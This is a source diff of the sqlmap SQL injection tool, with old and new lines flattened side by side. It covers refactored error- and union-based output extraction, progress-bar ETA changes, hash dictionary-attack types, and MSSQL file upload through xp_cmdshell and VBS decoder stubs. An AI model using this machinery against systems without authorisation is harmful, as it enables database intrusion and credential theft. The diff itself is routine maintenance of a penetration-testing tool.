extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
None
) )
if output is not None: if output is not None:
output = getUnicode(output) output = getUnicode(output)
else: else:
trimmed = ( trimmed = firstNotNone(
extractRegexResult(trimcheck, page) or extractRegexResult(trimCheck, page),
extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) or extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) or extractRegexResult(trimCheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) extractRegexResult(trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
) )
if trimmed: if trimmed:
@@ -163,7 +163,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
output = extractRegexResult(check, trimmed, re.IGNORECASE) output = extractRegexResult(check, trimmed, re.IGNORECASE)
if not output: if not output:
check = "(?P<result>[^\s<>'\"]+)" check = r"(?P<result>[^\s<>'\"]+)"
output = extractRegexResult(check, trimmed, re.IGNORECASE) output = extractRegexResult(check, trimmed, re.IGNORECASE)
else: else:
output = output.rstrip() output = output.rstrip()
@@ -402,7 +402,6 @@ def errorUse(expression, dump=False):
while kb.threadContinue: while kb.threadContinue:
with kb.locks.limit: with kb.locks.limit:
try: try:
valueStart = time.time()
threadData.shared.counter += 1 threadData.shared.counter += 1
num = threadData.shared.limits.next() num = threadData.shared.limits.next()
except StopIteration: except StopIteration:
@@ -419,7 +418,7 @@ def errorUse(expression, dump=False):
with kb.locks.value: with kb.locks.value:
index = None index = None
if threadData.shared.showEta: if threadData.shared.showEta:
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) threadData.shared.progress.progress(threadData.shared.counter)
for index in xrange(1 + len(threadData.shared.buffered)): for index in xrange(1 + len(threadData.shared.buffered)):
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
break break

View File

@@ -56,7 +56,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
query = agent.suffixQuery(query, suffix=suffix, comment=comment) query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None
if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1):
infoMsg = "'ORDER BY' technique appears to be usable. " infoMsg = "'ORDER BY' technique appears to be usable. "

View File

@@ -19,6 +19,7 @@ from lib.core.common import calculateDeltaSeconds
from lib.core.common import clearConsoleLine from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout from lib.core.common import dataToStdout
from lib.core.common import extractRegexResult from lib.core.common import extractRegexResult
from lib.core.common import firstNotNone
from lib.core.common import flattenValue from lib.core.common import flattenValue
from lib.core.common import getConsoleWidth from lib.core.common import getConsoleWidth
from lib.core.common import getPartRun from lib.core.common import getPartRun
@@ -90,7 +91,10 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
# Parse the returned page to get the exact UNION-based # Parse the returned page to get the exact UNION-based
# SQL injection output # SQL injection output
def _(regex): def _(regex):
return reduce(lambda x, y: x if x is not None else y, (extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), None) return firstNotNone(
extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE),
extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)
)
# Automatically patching last char trimming cases # Automatically patching last char trimming cases
if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
@@ -308,7 +312,6 @@ def unionUse(expression, unpack=True, dump=False):
while kb.threadContinue: while kb.threadContinue:
with kb.locks.limit: with kb.locks.limit:
try: try:
valueStart = time.time()
threadData.shared.counter += 1 threadData.shared.counter += 1
num = threadData.shared.limits.next() num = threadData.shared.limits.next()
except StopIteration: except StopIteration:
@@ -333,7 +336,7 @@ def unionUse(expression, unpack=True, dump=False):
items = parseUnionPage(output) items = parseUnionPage(output)
if threadData.shared.showEta: if threadData.shared.showEta:
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) threadData.shared.progress.progress(threadData.shared.counter)
if isListLike(items): if isListLike(items):
# in case that we requested N columns and we get M!=N then we have to filter a bit # in case that we requested N columns and we get M!=N then we have to filter a bit
if len(items) > 1 and len(expressionFieldsList) > 1: if len(items) > 1 and len(expressionFieldsList) > 1:
@@ -355,7 +358,7 @@ def unionUse(expression, unpack=True, dump=False):
else: else:
index = None index = None
if threadData.shared.showEta: if threadData.shared.showEta:
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) threadData.shared.progress.progress(threadData.shared.counter)
for index in xrange(1 + len(threadData.shared.buffered)): for index in xrange(1 + len(threadData.shared.buffered)):
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
break break

View File

@@ -65,7 +65,7 @@ def checkDependencies():
except ImportError: except ImportError:
warnMsg = "sqlmap requires 'python-impacket' third-party library for " warnMsg = "sqlmap requires 'python-impacket' third-party library for "
warnMsg += "out-of-band takeover feature. Download from " warnMsg += "out-of-band takeover feature. Download from "
warnMsg += "'http://code.google.com/p/impacket/'" warnMsg += "'https://github.com/coresecurity/impacket'"
logger.warn(warnMsg) logger.warn(warnMsg)
missing_libraries.add('python-impacket') missing_libraries.add('python-impacket')
@@ -76,7 +76,7 @@ def checkDependencies():
except ImportError: except ImportError:
warnMsg = "sqlmap requires 'python-ntlm' third-party library " warnMsg = "sqlmap requires 'python-ntlm' third-party library "
warnMsg += "if you plan to attack a web application behind NTLM " warnMsg += "if you plan to attack a web application behind NTLM "
warnMsg += "authentication. Download from 'http://code.google.com/p/python-ntlm/'" warnMsg += "authentication. Download from 'https://github.com/mullender/python-ntlm'"
logger.warn(warnMsg) logger.warn(warnMsg)
missing_libraries.add('python-ntlm') missing_libraries.add('python-ntlm')
@@ -101,7 +101,7 @@ def checkDependencies():
warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "be able to take advantage of the sqlmap TAB "
warnMsg += "completion and history support features in the SQL " warnMsg += "completion and history support features in the SQL "
warnMsg += "shell and OS shell. Download from " warnMsg += "shell and OS shell. Download from "
warnMsg += "'http://ipython.scipy.org/moin/PyReadline/Intro'" warnMsg += "'https://pypi.org/project/pyreadline/'"
logger.warn(warnMsg) logger.warn(warnMsg)
missing_libraries.add('python-pyreadline') missing_libraries.add('python-pyreadline')

View File

@@ -7,7 +7,7 @@ See the file 'LICENSE' for copying permission
try: try:
from crypt import crypt from crypt import crypt
except ImportError: except: # removed ImportError because of https://github.com/sqlmapproject/sqlmap/issues/3171
from thirdparty.fcrypt.fcrypt import crypt from thirdparty.fcrypt.fcrypt import crypt
_multiprocessing = None _multiprocessing = None
@@ -75,6 +75,7 @@ from lib.core.settings import COMMON_PASSWORD_SUFFIXES
from lib.core.settings import COMMON_USER_COLUMNS from lib.core.settings import COMMON_USER_COLUMNS
from lib.core.settings import DEV_EMAIL_ADDRESS from lib.core.settings import DEV_EMAIL_ADDRESS
from lib.core.settings import DUMMY_USER_PREFIX from lib.core.settings import DUMMY_USER_PREFIX
from lib.core.settings import HASH_EMPTY_PASSWORD_MARKER
from lib.core.settings import HASH_MOD_ITEM_DISPLAY from lib.core.settings import HASH_MOD_ITEM_DISPLAY
from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN
@@ -684,7 +685,7 @@ def attackDumpedTable():
value = table[column]['values'][i] value = table[column]['values'][i]
if value and value.lower() in lut: if value and value.lower() in lut:
table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()])) table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER))
table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i]))
def hashRecognition(value): def hashRecognition(value):
@@ -903,7 +904,7 @@ def dictionaryAttack(attack_dict):
if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64):
item = [(user, hash_.decode("base64").encode("hex")), {}] item = [(user, hash_.decode("base64").encode("hex")), {}]
elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.APACHE_SHA1): elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1):
item = [(user, hash_), {}] item = [(user, hash_), {}]
elif hash_regex in (HASH.SSHA,): elif hash_regex in (HASH.SSHA,):
item = [(user, hash_), {"salt": hash_.decode("base64")[20:]}] item = [(user, hash_), {"salt": hash_.decode("base64")[20:]}]

View File

@@ -11,6 +11,7 @@ from extra.safe2bin.safe2bin import safechardecode
from lib.core.agent import agent from lib.core.agent import agent
from lib.core.bigarray import BigArray from lib.core.bigarray import BigArray
from lib.core.common import Backend from lib.core.common import Backend
from lib.core.common import getSafeExString
from lib.core.common import getUnicode from lib.core.common import getUnicode
from lib.core.common import isNoneValue from lib.core.common import isNoneValue
from lib.core.common import isNumPosStrValue from lib.core.common import isNumPosStrValue
@@ -31,7 +32,7 @@ from lib.core.settings import NULL
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.request import inject from lib.request import inject
def pivotDumpTable(table, colList, count=None, blind=True): def pivotDumpTable(table, colList, count=None, blind=True, alias=None):
lengths = {} lengths = {}
entries = {} entries = {}
@@ -88,7 +89,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
if not validPivotValue: if not validPivotValue:
for column in colList: for column in colList:
infoMsg = "fetching number of distinct " infoMsg = "fetching number of distinct "
infoMsg += "values for column '%s'" % column infoMsg += "values for column '%s'" % column.replace(("%s." % alias) if alias else "", "")
logger.info(infoMsg) logger.info(infoMsg)
query = dumpNode.count2 % (column, table) query = dumpNode.count2 % (column, table)
@@ -99,7 +100,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
validColumnList = True validColumnList = True
if value == count: if value == count:
infoMsg = "using column '%s' as a pivot " % column infoMsg = "using column '%s' as a pivot " % column.replace(("%s." % alias) if alias else "", "")
infoMsg += "for retrieving row data" infoMsg += "for retrieving row data"
logger.info(infoMsg) logger.info(infoMsg)
@@ -174,10 +175,10 @@ def pivotDumpTable(table, colList, count=None, blind=True):
warnMsg += "will display partial output" warnMsg += "will display partial output"
logger.warn(warnMsg) logger.warn(warnMsg)
except SqlmapConnectionException, e: except SqlmapConnectionException, ex:
errMsg = "connection exception detected. sqlmap " errMsg = "connection exception detected ('%s'). sqlmap " % getSafeExString(ex)
errMsg += "will display partial output" errMsg += "will display partial output"
errMsg += "'%s'" % e
logger.critical(errMsg) logger.critical(errMsg)
return entries, lengths return entries, lengths

View File

@@ -5,6 +5,8 @@ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import time
from lib.core.common import getUnicode from lib.core.common import getUnicode
from lib.core.common import dataToStdout from lib.core.common import dataToStdout
from lib.core.data import conf from lib.core.data import conf
@@ -17,13 +19,12 @@ class ProgressBar(object):
def __init__(self, minValue=0, maxValue=10, totalWidth=None): def __init__(self, minValue=0, maxValue=10, totalWidth=None):
self._progBar = "[]" self._progBar = "[]"
self._oldProgBar = ""
self._min = int(minValue) self._min = int(minValue)
self._max = int(maxValue) self._max = int(maxValue)
self._span = max(self._max - self._min, 0.001) self._span = max(self._max - self._min, 0.001)
self._width = totalWidth if totalWidth else conf.progressWidth self._width = totalWidth if totalWidth else conf.progressWidth
self._amount = 0 self._amount = 0
self._times = [] self._start = None
self.update() self.update()
def _convertSeconds(self, value): def _convertSeconds(self, value):
@@ -52,7 +53,7 @@ class ProgressBar(object):
percentDone = min(100, int(percentDone)) percentDone = min(100, int(percentDone))
# Figure out how many hash bars the percentage should be # Figure out how many hash bars the percentage should be
allFull = self._width - len("100%% [] %s/%s ETA 00:00" % (self._max, self._max)) allFull = self._width - len("100%% [] %s/%s (ETA 00:00)" % (self._max, self._max))
numHashes = (percentDone / 100.0) * allFull numHashes = (percentDone / 100.0) * allFull
numHashes = int(round(numHashes)) numHashes = int(round(numHashes))
@@ -68,19 +69,18 @@ class ProgressBar(object):
percentString = getUnicode(percentDone) + "%" percentString = getUnicode(percentDone) + "%"
self._progBar = "%s %s" % (percentString, self._progBar) self._progBar = "%s %s" % (percentString, self._progBar)
def progress(self, deltaTime, newAmount): def progress(self, newAmount):
""" """
This method saves item delta time and shows updated progress bar with calculated eta This method saves item delta time and shows updated progress bar with calculated eta
""" """
if len(self._times) <= ((self._max * 3) / 100) or newAmount > self._max: if self._start is None or newAmount > self._max:
self._start = time.time()
eta = None eta = None
else: else:
midTime = sum(self._times) / len(self._times) delta = time.time() - self._start
midTimeWithLatest = (midTime + deltaTime) / 2 eta = (self._max - self._min) * (1.0 * delta / newAmount) - delta
eta = midTimeWithLatest * (self._max - newAmount)
self._times.append(deltaTime)
self.update(newAmount) self.update(newAmount)
self.draw(eta) self.draw(eta)
@@ -89,15 +89,13 @@ class ProgressBar(object):
This method draws the progress bar if it has changed This method draws the progress bar if it has changed
""" """
if self._progBar != self._oldProgBar: dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" (ETA %s)" % (self._convertSeconds(int(eta)) if eta is not None else "??:??"))))
self._oldProgBar = self._progBar if self._amount >= self._max:
dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" ETA %s" % self._convertSeconds(int(eta))) if eta is not None else "")) if not conf.liveTest:
if self._amount >= self._max: dataToStdout("\r%s\r" % (" " * self._width))
if not conf.liveTest: kb.prependFlag = False
dataToStdout("\r%s\r" % (" " * self._width)) else:
kb.prependFlag = False dataToStdout("\n")
else:
dataToStdout("\n")
def __str__(self): def __str__(self):
""" """

View File

@@ -6,18 +6,23 @@ See the file 'LICENSE' for copying permission
""" """
import sys import sys
import time
PYVERSION = sys.version.split()[0] PYVERSION = sys.version.split()[0]
if PYVERSION >= "3" or PYVERSION < "2.6": if PYVERSION >= "3" or PYVERSION < "2.6":
exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) exit("[%s] [CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % (time.strftime("%X"), PYVERSION))
errors = []
extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib") extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib")
try: for _ in extensions:
for _ in extensions: try:
__import__(_) __import__(_)
except ImportError: except ImportError:
errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) errors.append(_)
if errors:
errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in errors))
errMsg += "most likely because current version of Python has been " errMsg += "most likely because current version of Python has been "
errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" errMsg += "built without appropriate dev packages"
exit(errMsg) exit(errMsg)

View File

@@ -129,7 +129,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp.get("dbmsVersion")
if re.search(r"-log$", kb.data.banner): if re.search(r"-log$", kb.data.banner):
banVer += ", logging enabled" banVer += ", logging enabled"

View File

@@ -68,7 +68,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -50,7 +50,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp.get("dbmsVersion")
if re.search(r"-log$", kb.data.banner): if re.search(r"-log$", kb.data.banner):
banVer += ", logging enabled" banVer += ", logging enabled"

View File

@@ -47,7 +47,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
if re.search(r"-log$", kb.data.banner): if re.search(r"-log$", kb.data.banner):
banVer += ", logging enabled" banVer += ", logging enabled"

View File

@@ -44,7 +44,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp.get("dbmsVersion")
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

View File

@@ -43,9 +43,8 @@ class Enumeration(GenericEnumeration):
logger.info(infoMsg) logger.info(infoMsg)
rootQuery = queries[DBMS.MAXDB].dbs rootQuery = queries[DBMS.MAXDB].dbs
randStr = randomStr()
query = rootQuery.inband.query query = rootQuery.inband.query
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.schemaname' % kb.aliasName], blind=True)
if retVal: if retVal:
kb.data.cachedDbs = retVal[0].values()[0] kb.data.cachedDbs = retVal[0].values()[0]
@@ -79,9 +78,8 @@ class Enumeration(GenericEnumeration):
rootQuery = queries[DBMS.MAXDB].tables rootQuery = queries[DBMS.MAXDB].tables
for db in dbs: for db in dbs:
randStr = randomStr()
query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER') query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER')
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.tablename' % randStr], blind=True) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.tablename' % kb.aliasName], blind=True)
if retVal: if retVal:
for table in retVal[0].values()[0]: for table in retVal[0].values()[0]:
@@ -193,7 +191,7 @@ class Enumeration(GenericEnumeration):
if dumpMode and colList: if dumpMode and colList:
table = {} table = {}
table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList)
kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table
continue continue
@@ -202,15 +200,14 @@ class Enumeration(GenericEnumeration):
infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg) logger.info(infoMsg)
randStr = randomStr()
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER') query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER')
retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.columnname' % randStr, '%s.datatype' % randStr, '%s.len' % randStr], blind=True) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.columnname' % kb.aliasName, '%s.datatype' % kb.aliasName, '%s.len' % kb.aliasName], blind=True)
if retVal: if retVal:
table = {} table = {}
columns = {} columns = {}
for columnname, datatype, length in zip(retVal[0]["%s.columnname" % randStr], retVal[0]["%s.datatype" % randStr], retVal[0]["%s.len" % randStr]): for columnname, datatype, length in zip(retVal[0]["%s.columnname" % kb.aliasName], retVal[0]["%s.datatype" % kb.aliasName], retVal[0]["%s.len" % kb.aliasName]):
columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length) columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length)
table[tbl] = columns table[tbl] = columns

View File

@@ -67,11 +67,11 @@ class Filesystem(GenericFilesystem):
chunkName = randomStr(lowercase=True) chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName) fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr)) logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
@@ -174,10 +174,10 @@ class Filesystem(GenericFilesystem):
encodedFileContent = base64encode(wFileContent) encodedFileContent = base64encode(wFileContent)
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File) encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)
wFileSize = len(encodedFileContent) wFileSize = len(encodedFileContent)
chunkMaxSize = 1024 chunkMaxSize = 1024
@@ -212,15 +212,15 @@ class Filesystem(GenericFilesystem):
logger.info(infoMsg) logger.info(infoMsg)
dFileName = ntpath.basename(dFile) dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName) sFile = "%s\\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile) wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00 debugSize = 0xFF00
if wFileSize < debugSize: if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath) chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType) debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ( commands = (
@@ -248,7 +248,7 @@ class Filesystem(GenericFilesystem):
debugMsg = "appending chunk " debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName) copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ( commands = (
@@ -275,7 +275,7 @@ class Filesystem(GenericFilesystem):
randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile) randFilePath = "%s\\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s" inputFilePath = "%s"
@@ -338,7 +338,7 @@ class Filesystem(GenericFilesystem):
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
@@ -359,7 +359,7 @@ class Filesystem(GenericFilesystem):
chunkMaxSize = 500 chunkMaxSize = 500
randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile) randFilePath = "%s\\%s" % (tmpPath, randFile)
encodedFileContent = base64encode(wFileContent) encodedFileContent = base64encode(wFileContent)

View File

@@ -46,9 +46,9 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
release = kb.bannerFp["dbmsRelease"] if 'dbmsRelease' in kb.bannerFp else None release = kb.bannerFp.get("dbmsRelease")
version = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None version = kb.bannerFp.get("dbmsVersion")
servicepack = kb.bannerFp["dbmsServicePack"] if 'dbmsServicePack' in kb.bannerFp else None servicepack = kb.bannerFp.get("dbmsServicePack")
if release and version and servicepack: if release and version and servicepack:
banVer = "%s %s " % (DBMS.MSSQL, release) banVer = "%s %s " % (DBMS.MSSQL, release)

View File

@@ -37,7 +37,7 @@ class Connector(GenericConnector):
try: try:
self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
except (pymysql.OperationalError, pymysql.InternalError), msg: except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError), msg:
raise SqlmapConnectionException(msg[1]) raise SqlmapConnectionException(msg[1])
except struct.error, msg: except struct.error, msg:
raise SqlmapConnectionException(msg) raise SqlmapConnectionException(msg)

View File

@@ -5,6 +5,8 @@ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.agent import agent
from lib.core.common import getSQLSnippet
from lib.core.common import isNumPosStrValue from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable from lib.core.common import isTechniqueAvailable
from lib.core.common import popValue from lib.core.common import popValue
@@ -16,11 +18,13 @@ from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.decorators import stackedmethod from lib.core.decorators import stackedmethod
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE from lib.core.enums import PLACE
